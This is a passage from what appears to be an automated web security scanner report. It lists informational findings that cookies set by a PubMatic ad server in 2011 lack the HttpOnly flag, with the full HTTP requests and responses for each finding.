Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; PMAT=0; KRTBCOOKIE_80=1336-d454714d-69b5-4195-969b-ba426f1012c3.; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_218=4056--5675633421699857517=; KRTBCOOKIE_200=3683-d0f5e0cea474; KRTBCOOKIE_16=226-3620501663059719663; pubtime_27331=TMC; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758; USCC=ONE; PMDTSHR=cat:; PUBMDCID=1; KTPCACOOKIE=YES

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Sat, 17 Sep 2011 01:07:16 GMT
Content-Length: 1938
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Sun, 16-Sep-2012 01:07:16 GMT; path=/
Set-Cookie: pubfreq_27331_23102_1915562687=1053-1; domain=pubmatic.com; expires=Sat, 17-Sep-2011 01:47:16 GMT; path=/
Set-Cookie: PMDTSHR=cat:; domain=pubmatic.com; expires=Sun, 18-Sep-2011 01:07:16 GMT; path=/

document.write('<div id="http_bostonherald_comincludesprocessAds_bgkomli_ads_frame12733027331" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " clickdata=w
...[SNIP]...

12.197. http://showadsak.pubmatic.com/AdServer/AdServerServlet  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=27330&siteId=27331&adId=22455&kadwidth=728&kadheight=90&kbgColor=&ktextColor=&klinkColor=&pageURL=http://bostonherald.com/includes/processAds.bg&frameName=http_bostonherald_comincludesprocessAds_bgkomli_ads_frame12733027331&kltstamp=2011-8-17%201%3A8%3A21&ranreq=0.17113998159766197&timezone=-5&screenResolution=1920x1200&inIframe=1 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/includes/processAds.bg?position=Top&companion=Top,Right,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Finside_track%2Farticle
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; PMAT=0; KRTBCOOKIE_80=1336-d454714d-69b5-4195-969b-ba426f1012c3.; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_218=4056--5675633421699857517=; KRTBCOOKIE_200=3683-d0f5e0cea474; KRTBCOOKIE_16=226-3620501663059719663; pubtime_27331=TMC; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758; USCC=ONE; PMDTSHR=cat:; PUBMDCID=1; KTPCACOOKIE=YES

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Sat, 17 Sep 2011 01:06:55 GMT
Content-Length: 1858
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Sun, 16-Sep-2012 01:06:55 GMT; path=/
Set-Cookie: pubfreq_27331_22455_910669727=1053-1; domain=pubmatic.com; expires=Sat, 17-Sep-2011 01:46:55 GMT; path=/
Set-Cookie: PMDTSHR=cat:; domain=pubmatic.com; expires=Sun, 18-Sep-2011 01:06:55 GMT; path=/

document.write('<div id="http_bostonherald_comincludesprocessAds_bgkomli_ads_frame12733027331" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " clickdata=w
...[SNIP]...

12.198. http://showadsak.pubmatic.com/AdServer/AdServerServlet  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=27330&siteId=27331&adId=22455&kadwidth=728&kadheight=90&kadNetwork=661&prevkadIds=22455&kbgColor=&ktextColor=&klinkColor=&pageURL=http://ad.afy11.net/ad&frameName=http_ad_afy11_netadkomli_ads_frame22733027331&kltstamp=2011-8-17%201%3A8%3A46&ranreq=0.3321335173677653&timezone=-5&screenResolution=1920x1200&inIframe=1&adPosition=-1x-1&adVisibility=0 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000005414407&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=11415325&rk1=4961111&rk2=1316239725.757&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; PMAT=0; KRTBCOOKIE_80=1336-d454714d-69b5-4195-969b-ba426f1012c3.; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_218=4056--5675633421699857517=; KRTBCOOKIE_200=3683-d0f5e0cea474; KRTBCOOKIE_16=226-3620501663059719663; pubtime_27331=TMC; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758; SYNCUPPIX_ON=YES; USCC=ONE; DPPIX_ON=YES; PMDTSHR=cat:; KTPCACOOKIE=YES; PUBMDCID=1

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Sat, 17 Sep 2011 01:07:20 GMT
Content-Length: 1376
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Sun, 16-Sep-2012 01:07:20 GMT; path=/
Set-Cookie: pubfreq_27331_22455_840239298=325-1; domain=pubmatic.com; expires=Sat, 17-Sep-2011 01:47:20 GMT; path=/

document.write('<div id="http_ad_afy11_netadkomli_ads_frame22733027331" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " clickdata=wmoAAMNqAAC3VwAAAAAAAAAA
...[SNIP]...

12.199. http://showadsak.pubmatic.com/AdServer/AdServerServlet  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=27330&siteId=27331&adId=23102&kadwidth=300&kadheight=250&kbgColor=&ktextColor=&klinkColor=&pageURL=http://bostonherald.com/includes/processAds.bg&frameName=http_bostonherald_comincludesprocessAds_bgkomli_ads_frame12733027331&kltstamp=2011-8-17%201%3A5%3A34&ranreq=0.6695490968413651&timezone=-5&screenResolution=1920x1200&inIframe=1 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Right,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fnational%2Fremembering_911%2Fhome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; PMAT=0; KRTBCOOKIE_80=1336-d454714d-69b5-4195-969b-ba426f1012c3.; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_218=4056--5675633421699857517=; KRTBCOOKIE_200=3683-d0f5e0cea474; KRTBCOOKIE_16=226-3620501663059719663; pubtime_27331=TMC; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758; KTPCACOOKIE=YES; SYNCUPPIX_ON=YES; USCC=ONE; DPPIX_ON=YES; PUBMDCID=1; PMDTSHR=cat:

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Sat, 17 Sep 2011 01:04:08 GMT
Content-Length: 1943
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Sun, 16-Sep-2012 01:04:08 GMT; path=/
Set-Cookie: pubfreq_27331_23102_1450402887=1053-1; domain=pubmatic.com; expires=Sat, 17-Sep-2011 01:44:08 GMT; path=/
Set-Cookie: PMDTSHR=cat:; domain=pubmatic.com; expires=Sun, 18-Sep-2011 01:04:08 GMT; path=/

document.write('<div id="http_bostonherald_comincludesprocessAds_bgkomli_ads_frame12733027331" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " clickdata=w
...[SNIP]...

12.200. http://showadsak.pubmatic.com/AdServer/AdServerServlet  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=27330&siteId=27331&adId=22455&kadwidth=728&kadheight=90&kbgColor=&ktextColor=&klinkColor=&pageURL=http://bh.heraldinteractive.com/includes/processAds.bg&frameName=http_bh_heraldinteractive_comincludesprocessAds_bgkomli_ads_frame12733027331&kltstamp=2011-8-17%201%3A8%3A55&ranreq=0.2872365918010473&timezone=-5&screenResolution=1920x1200&inIframe=1 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://bh.heraldinteractive.com/includes/processAds.bg?position=Top&companion=Top,x14,x15,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com/news/home
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; PMAT=0; KRTBCOOKIE_80=1336-d454714d-69b5-4195-969b-ba426f1012c3.; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_218=4056--5675633421699857517=; KRTBCOOKIE_200=3683-d0f5e0cea474; KRTBCOOKIE_16=226-3620501663059719663; pubtime_27331=TMC; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758; USCC=ONE; PMDTSHR=cat:; PUBMDCID=1; KTPCACOOKIE=YES

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Sat, 17 Sep 2011 01:07:29 GMT
Content-Length: 1877
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Sun, 16-Sep-2012 01:07:29 GMT; path=/
Set-Cookie: pubfreq_27331_22455_832345834=1053-1; domain=pubmatic.com; expires=Sat, 17-Sep-2011 01:47:29 GMT; path=/
Set-Cookie: PMDTSHR=cat:; domain=pubmatic.com; expires=Sun, 18-Sep-2011 01:07:29 GMT; path=/

document.write('<div id="http_bh_heraldinteractive_comincludesprocessAds_bgkomli_ads_frame12733027331" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " cli
...[SNIP]...

12.201. http://showadsak.pubmatic.com/AdServer/AdServerServlet  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=27330&siteId=27331&adId=22454&kadwidth=300&kadheight=250&kadNetwork=1053&kbgColor=ffffff&ktextColor=000000&klinkColor=0000EE&pageURL=http://ad.afy11.net/ad&frameName=http_ad_afy11_netadkomli_ads_frame12733027331&kltstamp=2011-8-17%201%3A7%3A43&ranreq=0.1066701749805361&timezone=-5&screenResolution=1920x1200&inIframe=1&adPosition=-1x-1&adVisibility=0 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000005414207&sd=2x300x250&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=24942526&rk1=75947666&rk2=1316239663.497&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; PMAT=0; KRTBCOOKIE_80=1336-d454714d-69b5-4195-969b-ba426f1012c3.; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_218=4056--5675633421699857517=; KRTBCOOKIE_200=3683-d0f5e0cea474; KRTBCOOKIE_16=226-3620501663059719663; pubtime_27331=TMC; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758; SYNCUPPIX_ON=YES; USCC=ONE; DPPIX_ON=YES; PMDTSHR=cat:; PUBMDCID=1; KTPCACOOKIE=YES

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Sat, 17 Sep 2011 01:06:17 GMT
Content-Length: 1177
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Sun, 16-Sep-2012 01:06:17 GMT; path=/
Set-Cookie: pubfreq_27331_22454_1965058357=776-1; domain=pubmatic.com; expires=Sat, 17-Sep-2011 01:46:17 GMT; path=/

document.write('<div id="http_ad_afy11_netadkomli_ads_frame12733027331" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " clickdata=wmoAAMNqAAC2VwAAAAAAAAAA
...[SNIP]...

12.202. http://showadsak.pubmatic.com/AdServer/AdServerServlet  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=27330&siteId=27331&adId=22455&kadwidth=728&kadheight=90&kbgColor=&ktextColor=&klinkColor=&pageURL=http://bostonherald.com/includes/processAds.bg&frameName=http_bostonherald_comincludesprocessAds_bgkomli_ads_frame12733027331&kltstamp=2011-8-17%201%3A8%3A42&ranreq=0.964064912404865&timezone=-5&screenResolution=1920x1200&inIframe=1 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/includes/processAds.bg?position=Top&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fhome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; PMAT=0; KRTBCOOKIE_80=1336-d454714d-69b5-4195-969b-ba426f1012c3.; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_218=4056--5675633421699857517=; KRTBCOOKIE_200=3683-d0f5e0cea474; KRTBCOOKIE_16=226-3620501663059719663; pubtime_27331=TMC; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758; USCC=ONE; PMDTSHR=cat:; PUBMDCID=1; KTPCACOOKIE=YES

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Sat, 17 Sep 2011 01:07:16 GMT
Content-Length: 1860
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Sun, 16-Sep-2012 01:07:16 GMT; path=/
Set-Cookie: pubfreq_27331_22455_1248155553=1053-1; domain=pubmatic.com; expires=Sat, 17-Sep-2011 01:47:16 GMT; path=/
Set-Cookie: PMDTSHR=cat:; domain=pubmatic.com; expires=Sun, 18-Sep-2011 01:07:16 GMT; path=/

document.write('<div id="http_bostonherald_comincludesprocessAds_bgkomli_ads_frame12733027331" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " clickdata=w
...[SNIP]...

12.203. http://showadsak.pubmatic.com/AdServer/AdServerServlet  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=27330&siteId=27331&adId=23103&kadwidth=728&kadheight=90&kbgColor=&ktextColor=&klinkColor=&pageURL=http://bostonherald.com/includes/processAds.bg&frameName=http_bostonherald_comincludesprocessAds_bgkomli_ads_frame12733027331&kltstamp=2011-8-17%201%3A8%3A22&ranreq=0.5897327524144202&timezone=-5&screenResolution=1920x1200&inIframe=1 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Right,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Finside_track%2Farticle
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; PMAT=0; KRTBCOOKIE_80=1336-d454714d-69b5-4195-969b-ba426f1012c3.; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_218=4056--5675633421699857517=; KRTBCOOKIE_200=3683-d0f5e0cea474; KRTBCOOKIE_16=226-3620501663059719663; pubtime_27331=TMC; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758; KTPCACOOKIE=YES; SYNCUPPIX_ON=YES; USCC=ONE; DPPIX_ON=YES; PUBMDCID=1; PMDTSHR=cat:

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Sat, 17 Sep 2011 01:06:55 GMT
Content-Length: 1935
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Sun, 16-Sep-2012 01:06:55 GMT; path=/
Set-Cookie: pubfreq_27331_23103_21811428=1053-1; domain=pubmatic.com; expires=Sat, 17-Sep-2011 01:46:55 GMT; path=/
Set-Cookie: PMDTSHR=cat:; domain=pubmatic.com; expires=Sun, 18-Sep-2011 01:06:55 GMT; path=/

document.write('<div id="http_bostonherald_comincludesprocessAds_bgkomli_ads_frame12733027331" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " clickdata=w
...[SNIP]...

12.204. http://showadsak.pubmatic.com/AdServer/AdServerServlet  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=27330&siteId=27331&adId=23103&kadwidth=728&kadheight=90&kadNetwork=1053&kbgColor=ffffff&ktextColor=000000&klinkColor=0000EE&pageURL=http://ad.afy11.net/ad&frameName=http_ad_afy11_netadkomli_ads_frame12733027331&kltstamp=2011-8-17%201%3A8%3A45&ranreq=0.2675711310002953&timezone=-5&screenResolution=1920x1200&inIframe=1&adPosition=-1x-1&adVisibility=0 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000007248707&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=60719089&rk1=94605455&rk2=1316239725.491&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; PMAT=0; KRTBCOOKIE_80=1336-d454714d-69b5-4195-969b-ba426f1012c3.; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_218=4056--5675633421699857517=; KRTBCOOKIE_200=3683-d0f5e0cea474; KRTBCOOKIE_16=226-3620501663059719663; pubtime_27331=TMC; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758; SYNCUPPIX_ON=YES; USCC=ONE; DPPIX_ON=YES; PMDTSHR=cat:; PUBMDCID=1; KTPCACOOKIE=YES

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Sat, 17 Sep 2011 01:07:19 GMT
Content-Length: 1832
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Sun, 16-Sep-2012 01:07:19 GMT; path=/
Set-Cookie: _curtime=1316221639; domain=pubmatic.com; expires=Sat, 17-Sep-2011 02:17:19 GMT; path=/
Set-Cookie: pubfreq_27331_23103_1477666717=243-1; domain=pubmatic.com; expires=Sat, 17-Sep-2011 01:47:19 GMT; path=/

document.writeln('<'+'script type="text/javascript"> document.writeln(\'<iframe width="728" scrolling="no" height="90" frameborder="0" name="iframe0" allowtransparency="true" marginheight="0" marginwi
...[SNIP]...

12.205. http://showadsak.pubmatic.com/AdServer/AdServerServlet  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

